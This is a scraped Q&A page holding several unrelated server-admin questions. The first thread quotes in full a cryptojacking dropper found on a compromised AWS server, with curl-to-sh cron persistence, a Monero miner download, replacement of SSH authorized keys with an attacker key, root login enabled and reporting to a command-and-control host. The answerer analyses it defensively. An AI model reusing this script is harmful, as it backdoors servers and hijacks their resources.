I am using aws and last couple of days I am seeing some unnecessary scripts running. Following is screen shot attached.
I tried to killed that process by sudo kill -9 {pId} but not able to do so.
Any suggesstion
Your box got compromised.
It downloads a script to your server and runs it
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x#xmr.crypto-pool.fr:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x#xmr.crypto-pool.fr:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
As you can see it deletes all ssh keys and creates a new one for the attackers to login.
At the end of the script it reports its status to
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=uname -i`
this server again so they can look at all compromised servers at once I think
Edit:
The domain is registered in Panama. Whoopsie. I think you should check your server and get some advice regarding the security of it.
Related
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 10 months ago.
Improve this question
I'm trying to create a Dockerfile that read some URLs from an online file but when I try to use wget with the URL in a variable, it fails. If I print the variables in a console message the result is the corrects URLs.
If the variables are declared with ENV or initialized with the URL I don't have problems to use it in the wget; the problem only happens when reading URLs from a file.
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -q "www.url_online_file.com" -O url.txt \
&& while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt \
&& echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; \
&& wget -q $URL1 -O url1.zip
Error:
DEBUG URL1=www.prueba1.com
DEBUG URL2=www.prueba2.com
The command '/bin/sh -c mkdir /opt/tools /aplicaciones /deployments && wget -q "www.url_online_file.com" -O url.txt && while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt && echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; && wget -q $URL1 -O url1.zip' returned a non-zero code: 8
The file.txt structure in online_file is:
url1=www.prueba1.com
url2=www.prueba2.com
The solution was used the command wget -i to the www.url_online_file.com and modified the content of the file to:
www.prueba1.com
www.prueba2.com
The dockerfile:
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -i "www.url_online_file.com" \
&& && rm url* \
&& mv url1* url1.zip \
&& mv url2* url2.zip \
&& unzip url1.zip -d /opt/tools \
&& unzip url2.zip -d /opt/tools \
&& rm url1.zip \
&& rm url2.zip
I'm having trouble making a bash script run when adding it to the user data on an ec2 launch template. I've looked at suggestions and tried multiple approaches including AWS's suggestion using MIME multi-part in the script. I tried the #cloud-boothook directive but it only runs parts of my script on boot. The interesting part is that once the instance is booted I can run the script successfully by invoking it manually in /var/lib/cloud/instances/instance id/user-data.txt. I'm not sure what else to try so any help is appreciated. Below is my script.
#cloud-boothook
#!/bin/bash
apt-get update
pip install -I ansible==2.6.2
cd /tmp
wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
tar -xvf go1.11.linux-amd64.tar.gz
mv go /usr/lib
apt-get -y install checkinstall build-essential
apt-get -y install libreadline6-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
cd /tmp
wget https://www.python.org/ftp/python/2.7.15/Python-2.7.15.tgz
tar -xvf Python-2.7.15.tgz
cd Python-2.7.15
./configure --prefix=/opt/python27myapp --enable-shared --enable-optimizations LDFLAGS=-Wl,-rpath=/opt/python27myapp/lib
make
checkinstall --pkgname=python27myapp --pkgversion=2.7.15 --pkgrelease=0 --nodoc --default make install
cd /tmp
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
/opt/python27myapp/bin/python /tmp/get-pip.py
/opt/python27myapp/bin/pip install --progress-bar=off virtualenv
set -euo pipefail
DEPLOYER="myapp"
PYTHON_DIST_PACKAGES="/usr/lib/python2.7/dist-packages"
PYTHON_SITE_PACKAGES="lib/python2.7/site-packages"
ANSIBLE_VENV_PATH="/mnt/ansible-12f"
ANSIBLE_USER="ansible"
ANSIBLE_VERSION="2.6.2.0"
ANSIBLE_USER_HOME="/home/${ANSIBLE_USER}"
TF_PLAYBOOK_REPO="git#github.com:myorg/${DEPLOYER}.git"
TF_PLAYBOOK_GITREF="2019.8.0"
TF_PLAYBOOK_OPTIONS="" # perhaps -vvvv
TF_PLAYBOOK_PATH="playbooks/twelve_factor/deploy.yml"
TF_APP_CONFIG_JSON="extra-vars.json"
TF_SCRATCH_DIR=$(mktemp -d -t tmp.XXXXXXXXXX)
TF_APP_CONFIG_PATH="${TF_SCRATCH_DIR}/config"
TF_ENVIRONMENT=""
EC2_INSTANCE_TAGS=""
CONFIG_BUCKET="databag-versions"
REGION=$(curl -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -c -r .region)
app_user="myapp"
git-with-ssm-key()
{
ssm_key="git_checkout_key"; shift
ssh-agent bash -o pipefail -c '
if aws ssm get-parameters \
--region "'$REGION'" \
--names "'$ssm_key'" \
--with-decryption \
--output text \
--query Parameters[0].Value |
ssh-add -k -
then
git "$#"
else
echo >&2 "ERROR: Failed to get or add key: '$ssm_key'"
exit 1
fi
' bash "$#"
}
#ssh-keyscan github.com >> ~/.ssh/known_hosts
# ============================================================================
cleanup() {
rm -rf $TF_SCRATCH_DIR
}
final_steps() {
cleanup
}
trap final_steps EXIT
# ============================================================================
install_packages() {
apt-get -y install jq
}
check_for_aws_cli() {
if ! aws help 1> /dev/null 2>&1; then
apt-get -y install awscli
fi
if ! aws help 1> /dev/null 2>&1; then
echo "The aws cli is not installed." 1>&2
exit 1
fi
echo "Found: $(aws --version 2>&1)"
}
application_deployed() {
[ -e "$TF_APP_HOME/current" ];
}
set_tf_app_home() {
TF_APP_HOME="$(jq .deploy_env.deploy_to $TF_APP_CONFIG_PATH | sed -e 's/^"//' -e 's/"$//')"
}
set_ec2_instance_tags() {
# We grab the EC2 tags of this instance.
instance_id=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
filters="Name=resource-id,Values=${instance_id}"
EC2_INSTANCE_TAGS=$(aws ec2 describe-tags --region $REGION --filters "${filters}" | jq .Tags)
}
set_tf_environment() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
name=$(echo "$EC2_INSTANCE_TAGS" | jq '.[] | select(.Key == "Environment") | .Value')
TF_ENVIRONMENT=$(echo $name | sed -e 's/^"//' -e 's/"$//')
}
set_config_bucket() {
case "$TF_ENVIRONMENT" in
innovate|production|bolt|operations|blackhat)
CONFIG_BUCKET="databag-versions"
;;
*)
CONFIG_BUCKET="databag-dev"
;;
esac
}
retrieve_configuration_source() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
selectName='.[] | select(.Key == "Name") | .Value'
name=$(echo "$EC2_INSTANCE_TAGS" | jq "$selectName" | sed -e 's/^"//' -e 's/"$//')
s3key="databags/$(echo $name | sed -e 's;-;/;g')"
aws s3 cp s3://${CONFIG_BUCKET}/${s3key} ${TF_APP_CONFIG_PATH}
set_git_ssh_key
set_tf_app_home
}
install_python() {
apt-get -y install python
pip install virtualenv
virtualenv $ANSIBLE_VENV_PATH
}
install_ansible() {
source ${ANSIBLE_VENV_PATH}/bin/activate
pip install ansible==${ANSIBLE_VERSION}
echo "$PYTHON_DIST_PACKAGES" > "${ANSIBLE_VENV_PATH}/${PYTHON_SITE_PACKAGES}/dist-packages.pth"
# This will go wrong if the system python path changes.
if [ ! -d "$PYTHON_DIST_PACKAGES" ]; then
echo "ERROR: the system python packages location does not exist: $PYTHON_DIST_PACKAGES"
exit 1
fi
# Having established a link between our vitualenv and the system python, we
# can now install python-apt.
pip install python-apt
}
add_playbook_user() {
if ! getent group $ANSIBLE_USER > /dev/null 2>&1; then
addgroup --system $ANSIBLE_USER
fi
if ! id -u $ANSIBLE_USER > /dev/null 2>&1; then
adduser --system --home $ANSIBLE_USER_HOME --shell /bin/false \
--ingroup $ANSIBLE_USER --disabled-password \
--gecos GECOS \
$ANSIBLE_USER
fi
if [ ! -d "$ANSIBLE_USER_HOME/.ssh" ]; then
mkdir $ANSIBLE_USER_HOME/.ssh
fi
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh
chmod 700 $ANSIBLE_USER_HOME/.ssh
echo "StrictHostKeyChecking no" > $ANSIBLE_USER_HOME/.ssh/config
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/config
# echo ${GIT_SSH_KEY} > $ANSIBLE_USER_HOME/.ssh/id_rsa
echo $GIT_SSH_KEY | sed -e "s/-----BEGIN RSA PRIVATE KEY-----/&\n/" -e "s/-----END RSA PRIVATE KEY-----/\n&/" -e "s/\S\{64\}/&\n/g" > $ANSIBLE_USER_HOME/.ssh/id_rsa
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/id_rsa
chmod 600 $ANSIBLE_USER_HOME/.ssh/id_rsa
if ! getent group $app_user > /dev/null 2>&1; then
addgroup --system $app_user
fi
if ! id -u $app_user > /dev/null 2>&1; then
adduser --system --home ${ANSIBLE_USER_HOME}/myapp --shell /bin/false \
--ingroup $app_user --disabled-password \
--gecos GECOS \
$app_user
fi
}
retrieve_playbook() {
rm -rf "${ANSIBLE_USER_HOME}/${DEPLOYER}"
(
cd "${ANSIBLE_USER_HOME}"
git-with-ssm-key /githubsshkeys/gitreader clone --branch "$TF_PLAYBOOK_GITREF" "$TF_PLAYBOOK_REPO"
)
chown -R ansible:ansible "${ANSIBLE_USER_HOME}/${DEPLOYER}"
}
patch_playbooks() {
awk '/^- name:/ {f=0} /^- name: Establish SSH credentials/ {f=1} !f;' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml > /tmp/temp_app_user.yml
cp /tmp/temp_app_user.yml ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml # temp file is necessary since awk can't edit in-place
# remove the 'singleton' run operation... this isn't a singleton, and the playbook fails on the check to determine that.
sed -i 's/^.*singleton.*$//' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app.yml
# fix the "invalid ioctl" warning, which is non-breaking but creates ugly warnings in the log
sed -i -e 's/mesg n .*true/tty -s \&\& mesg n/g' /root/.profile
# fix myapp user permissions in the /mnt/ansible-12f directories
chown -R myapp:myapp ${ANSIBLE_VENV_PATH}
# set up proper git SSH access for the ansible user
echo -e "host github.com\n HostName github.com\n IdentityFile ~/.ssh/id_rsa\n User git" >> $ANSIBLE_USER_HOME/.ssh/config
# set up the same git access for the myapp user
if [ ! -d "/mnt/myapp/.ssh" ]; then
mkdir -p /mnt/myapp/.ssh
fi
# ensure the directory will have the right permissions
mkdir -p /mnt/myapp/releases
cp ${ANSIBLE_USER_HOME}/.ssh/* /mnt/myapp/.ssh
chown -R ${app_user}:${app_user} /mnt/myapp
}
set_git_ssh_key() {
GIT_SSH_KEY="$(aws ssm get-parameters --region $REGION --names git_checkout_key --with-decryption --query Parameters[0].Value --output text)"
ssh-keyscan github.com >> ~/.ssh/known_hosts
}
write_inventory() {
IP_ADDRESS=$(curl -s http://169.254.169.254/latest/meta-data/local-ipv4)
cat - <<END_INVENTORY | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/inventory"
[${IP_ADDRESS}]
${IP_ADDRESS} ansible_python_interpreter=${ANSIBLE_VENV_PATH}/bin/python
[linux]
${IP_ADDRESS}
# This bizarre group name will never be used anywhere.
# We need another group with an entry in it to avoid triggering
# the cmd_singleton section.
[12345_xx_%%%%_xxxx_]
10.10.10.10
END_INVENTORY
}
# Located in the directory in which ansible-playbook is executed; it is
# automatically picked up as Ansible runs.
write_ansible_settings() {
cat - <<END_SETTINGS | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/ansible.cfg"
[defaults]
inventory = /etc/ansible/hosts
library = /usr/local/opt/ansible/libexec/lib/python2.7/site-packages/ansible/modules
remote_tmp = /tmp/.ansible-${USER}/tmp
pattern = *
forks = 5
poll_interval = 15
transport = smart
gathering = implicit
host_key_checking = False
# SSH timeout
timeout = 30
# we ssh as user medidata, becoming the 12-factor user, so:
# see https://docs.ansible.com/ansible/become.html#becoming-an-unprivileged-user
allow_world_readable_tmpfiles = True
ansible_managed = Ansible managed: {file} modified on %Y-%m-%d %H:%M:%S by {uid} on {host}
action_plugins = /usr/share/ansible_plugins/action_plugins
callback_plugins = /usr/share/ansible_plugins/callback_plugins
connection_plugins = /usr/share/ansible_plugins/connection_plugins
lookup_plugins = /usr/share/ansible_plugins/lookup_plugins
vars_plugins = /usr/share/ansible_plugins/vars_plugins
filter_plugins = /usr/share/ansible_plugins/filter_plugins
fact_caching = memory
retry_files_enabled = False
[ssh_connection]
# We have sometimes an error raised: Timeout (32s) waiting for privilege escalation prompt
# To avoid this, we make multiple attempts at the connection:
retries = 5
ssh_args = -o ControlMaster=auto -o ControlPersist=60s -o ServerAliveInterval=120
control_path = %(directory)s/%%h-%%r
pipelining = False
END_SETTINGS
}
write_deployment_config() {
cat - <<END_SETTINGS > "${ANSIBLE_USER_HOME}/${TF_APP_CONFIG_JSON}"
END_SETTINGS
}
run_deployment() {
write_inventory
write_ansible_settings
write_deployment_config
(
cd ${ANSIBLE_USER_HOME}
ansible-playbook "${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
-i ${ANSIBLE_USER_HOME}/inventory \
"${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
--connection=local \
--extra-vars #${TF_APP_CONFIG_PATH}
2> /tmp/ansible.err | tee /tmp/ansible.out
)
}
# -----------------------------------------------------
# ---------------- Script Starts Here -----------------
# -----------------------------------------------------
install_packages # do we need to check if packages already installed?
check_for_aws_cli
set_ec2_instance_tags
set_tf_environment
retrieve_configuration_source
if application_deployed; then
echo "Application already deployed; taking no action"
else
add_playbook_user
install_python
install_ansible
retrieve_playbook
patch_playbooks
run_deployment
fi
chown -R ${app_user}:${app_user} /mnt/myapp/services
chown -R ${app_user}:${app_user} /etc/sv/myapp*
I think you need to add sudo before every command.
Also can you plz share the error you are getting?
I solved the problem by removing set -euo pipefail in the script.
I recently inherited a build server that was running fine until last week and now I'm getting some "file not found" errors. I am using "rpmbuilder" as my non-root user. When I run my build command I get the following errors:
$ rpmbuild -bb -v rpmbuild/SPECS/mist.spec
Executing(%prep): /bin/sh -e /var/tmp/rpm-tmp.fUrkkG
Executing(%install): /bin/sh -e /var/tmp/rpm-tmp.edkQrN
Processing files: mist-2.0.2-1.x86_64
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
RPM build errors:
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
I used to get a ton of output under %prep but now there's nothing. I tried using %setup without -q and still get the same output.
As far as I can tell my source files are still where they should be:
[rpmbuilder#coams-db SOURCES]$ pwd
/home/rpmbuilder/rpmbuild/SOURCES
[rpmbuilder#coams-db SOURCES]$ ls -la
total 66124
drwxr-xr-x. 3 rpmbuilder rpmbuilder 4096 Jun 23 10:08 .
drwxr-xr-x. 8 rpmbuilder rpmbuilder 4096 Feb 25 2016 ..
drwxrwxr-x. 8 rpmbuilder rpmbuilder 4096 Jun 23 10:08 mist-2.0.2
-rw-rw-r--. 1 rpmbuilder rpmbuilder 67681925 Jun 23 10:09 mist-2.0.2.tar.gz
Has anyone seen this issue before? Are there some nitpicky things I didn't know to check? Like I said I don't recall changing anything but who knows...
My spec file is below:
Name: mist
Version: 2.0.2
Release: 1
Summary: <snip>
Group: <snip>
License: GPL
URL: http://<snip>
Source0: mist-2.0.2.tar.gz
BuildArch: x86_64
BuildRoot: /home/rpmbuilder/rpmbuild/%{name}-%{version}
Requires(pre): shadow-utils
Requires: python, mysql-server, python-sqlalchemy, MySQL-python, python-requests, python-lxml, pytz, python-jsonschema
%description
Installs the MIST application.
%pre
if [ $1 = 1 ]; then
getent group mist > /dev/null || groupadd -r mist
getent passwd mist > /dev/null || useradd -r -g mist -d /opt/mist -c "MIST Console User" mist -p '<snip>'
# echo "Starting Cron Setup........."
#echo "Create temp file to hold cron currnet data"
#%define tempFile `mktemp`
#store temp file name
#TEMP_FILE_NAME=%{tempFile}
#echo "Storing crontab current data in temp file %{tempFile}"
#CRON_OUT_FILE=`crontab -l > $TEMP_FILE_NAME`
#echo "Add required cron detalis in cron temp file"
#ADD_TO_CRON=`echo "#Schedule the following cron job to <snip>:" >> $TEMP_FILE_NAME`
#Replace the http://servername.com/file.php with file path or link
#ADD_TO_CRON=`echo "*/30 * * * * python /opt/mist/assets/pull_assets.py > /dev/null 2>&1" >> $TEMP_FILE_NAME`
#echo "Storing temp cron to the crontab"
#ADD_TEMP_TO_CRON=`crontab $TEMP_FILE_NAME`
#echo "Remove %{tempFile} temp file"
#rm -r -f $TEMP_FILE_NAME
#get current crontab list for email
#%define cornDataNow `crontab -l`
#exit 0
fi
if [ $1 = 2 ]; then
/sbin/service mist stop
#cp -r /opt/mist/frontend/server/conf /opt
#rm -rf /opt/mist/frontend/server/work
fi
%preun
if [ $1 = 0 ]; then
/sbin/service mist stop
fi
%prep
%setup -q
%install
# rm -rf "$RPM_BUILD_ROOT"
echo $RPM_BUILD_ROOT
mkdir -p "$RPM_BUILD_ROOT/opt/mist"
cp -R . "$RPM_BUILD_ROOT/opt/mist"
mkdir -p "$RPM_BUILD_ROOT/var/log/MIST"
exit 0
%files
%attr(750,mist,mist) /opt/mist
%attr(400,mist,mist) /opt/mist/database/config.pyc
%attr(640,mist,mist) /opt/mist/database/mist_db.sql
%attr(640,mist,mist) /opt/mist/database/.password_complexity.conf
#/opt/mist
%doc
%post
if [ $1 = 1 ]; then
mv /opt/mist/mist_base/mist /etc/init.d
chmod 755 /etc/init.d/mist
chkconfig mist on --level 345
mv /opt/mist/database/my.cnf /etc
/usr/sbin/usermod -a -G mist mysql
/usr/sbin/setsebool allow_user_mysql_connect 1
/bin/mkdir -p /var/log/MIST/frontend
chown -R root.mist /var/log/MIST
chmod -R 775 /var/log/MIST
fi
if [ $1 = 2 ]; then
#cp -r /opt/conf /opt/mist/frontend/server
#rm -r /opt/conf
#rm /opt/mist/frontend/mist
if [ -d /opt/mist/frontend ]; then
rm -rf /opt/mist/frontend
fi
mv /opt/mist/mist_base/mist /etc/init.d
rm /opt/mist/database/my.cnf
/sbin/service mist start
fi
mv /opt/mist/mist_logging.py /usr/lib/python2.6/site-packages
chmod 644 /usr/lib/python2.6/site-packages/mist_logging.py
%postun
if [ $1 = 0 ]; then
/bin/rm -r /opt/mist
chkconfig --del mist
/bin/rm /etc/init.d/mist
/bin/rm /etc/my.cnf
/bin/rm /usr/lib/python2.6/site-packages/mist_logging.py
/bin/rm -r /var/log/MIST
/usr/sbin/userdel --force mist 2> /dev/null; true
/usr/sbin/groupdel mist
/sbin/service mysqld stop
/bin/rm -r /var/lib/mysql
/bin/sed -i '/mistDB/d' /etc/hosts
#/usr/bin/crontab -l | grep -v "#Schedule the following cron job to <snip>:" | /usr/bin/crontab -
#/usr/bin/crontab -l | grep -v "python /opt/mist/assets/pull_assets.py" | /usr/bin/crontab -
fi
%changelog
I am able only to give the first user write, executable and read access to the export folder in the below Dockerfile
...
VOLUME ["/export/"]
RUN groupadd galaxy \
&& chgrp -R galaxy /export \
&& chmod -R 770 /export
RUN useradd dudleyk \
&& mkdir /home/dudleyk \
&& chown dudleyk:dudleyk /home/dudleyk \
&& addgroup dudleyk galaxy \
&& ln -s /export/ /home/dudleyk/ \
&& echo "dudleyk:dudleyk" | chpasswd
RUN useradd lorencm \
&& mkdir /home/lorencm \
&& chown lorencm:lorencm /home/lorencm \
&& addgroup lorencm galaxy \
&& ln -s /export/ /home/lorencm/ \
&& echo "lorencm:lorencm" | chpasswd
EXPOSE 8787
CMD ["/init"]
I logged to the docker container with docker run -it -v /home/galaxy:/export rstudio bash and it showed me the following
ls -ahl
drwxr-xr-x 43 dudleyk galaxy 4.0K Apr 8 00:09 export
How do I give the second user write, executable and read access to the export?
Thank you in advance
I am trying to use E²LSH, here is the manual. When untarred, the folder of this library has a Makefile, a bin folder and a source folder (among with other stuff).
In the source folder there is LSHMain.cpp, which I have to modify.
I deleted the project (just to make sure I haven't destroyed something), re-download it, modifying the file and then I hit make, but when I run the executable it is like all my modifications are gone and the original code is taken into account only!
This happens regardless of building the project from scratch or not.
I suspect that this has to do with the scripts inside bin folder, because I have to run it like this:
bin/lsh argument_list
What should I change?
Here is the Makefile (reduced, since some stuff is irrelevant)
SOURCES_DIR:=sources
OBJ_DIR:=bin
OUT_DIR:=bin
TEST_DIR:=$(SOURCES_DIR)
#H_SOURCES:=`find $(SOURCES_DIR) -name "*.h"`
#CPP_SOURCES:=`find $(SOURCES_DIR) -name "*.cpp"`
#TEST_SOURCES:=`find $(TEST_DIR) -name "*.cpp"`
OBJ_SOURCES:=$(SOURCES_DIR)/BucketHashing.cpp \
$(SOURCES_DIR)/Geometry.cpp \
$(SOURCES_DIR)/LocalitySensitiveHashing.cpp \
$(SOURCES_DIR)/Random.cpp \
$(SOURCES_DIR)/Util.cpp \
$(SOURCES_DIR)/GlobalVars.cpp \
$(SOURCES_DIR)/SelfTuning.cpp \
$(SOURCES_DIR)/NearNeighbors.cpp
LSH_BUILD:=LSHMain
TEST_BUILDS:=exactNNs \
genDS \
compareOutputs \
genPlantedDS
GCC:=g++
OPTIONS:=-O3 -DREAL_FLOAT -DDEBUG
# -march=athlon -msse -mfpmath=sse
LIBRARIES:=-lm
#-ldmalloc
all:
bin/compile
c: compile
compile:
#mkdir -p $(OUT_DIR)
$(GCC) -o $(OUT_DIR)/$(LSH_BUILD) $(OPTIONS) $(OBJ_SOURCES) $(SOURCES_DIR)/$(LSH_BUILD).cpp $(LIBRARIES)
chmod g+rwx $(OUT_DIR)/$(LSH_BUILD)
and here are the compile and lsh scripts (inside the bin folder, the Makefile was in the same directory with source and bin folders):
#!/bin/bash
OUT_DIR=bin
SOURCES_DIR=sources
OBJ_SOURCES="$SOURCES_DIR/BucketHashing.cpp \
$SOURCES_DIR/Geometry.cpp \
$SOURCES_DIR/LocalitySensitiveHashing.cpp \
$SOURCES_DIR/Random.cpp \
$SOURCES_DIR/Util.cpp \
$SOURCES_DIR/GlobalVars.cpp \
$SOURCES_DIR/SelfTuning.cpp \
$SOURCES_DIR/NearNeighbors.cpp"
TEST_BUILDS="exactNNs \
genDS \
compareOutputs \
genPlantedDS"
defineFloat=REAL_FLOAT
g++ -o $OUT_DIR/testFloat -DREAL_FLOAT $OBJ_SOURCES $SOURCES_DIR/testFloat.cpp -lm >/dev/null 2>&1 || defineFloat=REAL_DOUBLE
OPTIONS="-O3 -D$defineFloat"
g++ -o $OUT_DIR/LSHMain $OPTIONS $OBJ_SOURCES $SOURCES_DIR/LSHMain.cpp -lm
chmod g+rwx $OUT_DIR/LSHMain
for i in $TEST_BUILDS; do
g++ -o ${OUT_DIR}/$i $OPTIONS ${SOURCES_DIR}/${i}.cpp $OBJ_SOURCES -lm; chmod g+rwx $OUT_DIR/${i};
done
the lsh script
#!/bin/bash
dir=bin
if [ $# -le 2 ]; then
echo Usage: $0 radius data_set_file query_set_file "[successProbability]"
exit
fi
paramsFile=$2.params
if [ $# -ge 4 ]; then
# success probability supplied
$dir/lsh_computeParams $1 "$2" "$3" $4 > "$paramsFile" || exit 1
else
# success probability not supplied
$dir/lsh_computeParams $1 "$2" "$3" > "$paramsFile" || exit 1
fi
chmod g+rw "$paramsFile"
echo "R*******" >/dev/stderr
echo "R*********************" >/dev/stderr
echo "R-NN DS params computed." >/dev/stderr
echo "R*********************" >/dev/stderr
echo "R*******" >/dev/stderr
$dir/lsh_fromParams "$2" "$3" "$paramsFile"
EDIT_1
When I run make I get:
bin/compile
sources/LocalitySensitiveHashing.cpp: In function ‘RNNParametersT readRNNParameters(FILE*)’:
sources/LocalitySensitiveHashing.cpp:62:22: warning: ignoring return value of ‘int fscanf(FILE*, const char*, ...)’, declared with attribute warn_unused_result [-Wunused-result]
(many many warnings, but no errors, I have checked that I can execute the program afterwards)
With make c I got:
g++ -o bin/LSHMain -O3 -DREAL_FLOAT -DDEBUG sources/BucketHashing.cpp sources/Geometry.cpp sources/LocalitySensitiveHashing.cpp sources/Random.cpp sources/Util.cpp sources/GlobalVars.cpp sources/SelfTuning.cpp sources/NearNeighbors.cpp sources/LSHMain.cpp -lm
warnings
chmod g+rwx bin/LSHMain
I really don't get why this didn't work....
With make compile I got:
g++ -o bin/LSHMain -O3 -DREAL_FLOAT -DDEBUG sources/BucketHashing.cpp sources/Geometry.cpp sources/LocalitySensitiveHashing.cpp sources/Random.cpp sources/Util.cpp sources/GlobalVars.cpp sources/SelfTuning.cpp sources/NearNeighbors.cpp sources/LSHMain.cpp -lm
warnings
chmod g+rwx bin/LSHMain
EDIT_2
the lsh_comouteParams is this:
#!/bin/bash
successProbability=0.9
if [ $# -le 1 ]; then
echo Usage: $0 radius data_set_file "{query_set_file | .} [successProbability]"
exit
fi
if [ $# -ge 4 ]; then
# success probability supplied
successProbability=$4
fi
arch=`uname`
nDataSet=` wc -l "$2"`
for x in $nDataSet; do nDataSet=$x; break; done
if [ "$3" != "." ]; then
nQuerySet=` wc -l "$3"`
for x in $nQuerySet; do nQuerySet=$x; break; done
else
nQuerySet=0
fi
dimension=`head -1 "$2" | wc -w`
#echo $nDataSet $nQuerySet $dimension
if [ -e bin/mem ]; then
m=`cat bin/mem`;
elif [ "$arch" = "Darwin" ]
then
#http://discussions.apple.com/thread.jspa?threadID=1608380&tstart=0
m=`top -l 1 | grep PhysMem | awk -F "[M,]" ' {print$10 }'`
let m=m*1024*1024
echo $m > bin/mem
else
s=`free -m | grep "Mem:"`
for i in $s; do m=$i; if [ "$i" != "Mem:" ]; then break; fi; done
m=${m}000000
echo $m > bin/mem
fi
bin/LSHMain $nDataSet $nQuerySet $dimension $successProbability "$1" "$2" "$3" $m -c
I had modified the file as such:
int main(int nargs, char **args){
printf("uoo\n");return 0;
if(nargs < 9){
usage(args[0]);
exit(1);
}
...
}
When E²LSH doesn't receive the correct arguments, it won't run it's LSHMain (regardless the fact that there is a relevant code for that in that file - which what tricked me so badly, because I thought that I was reaching that point inside main()).
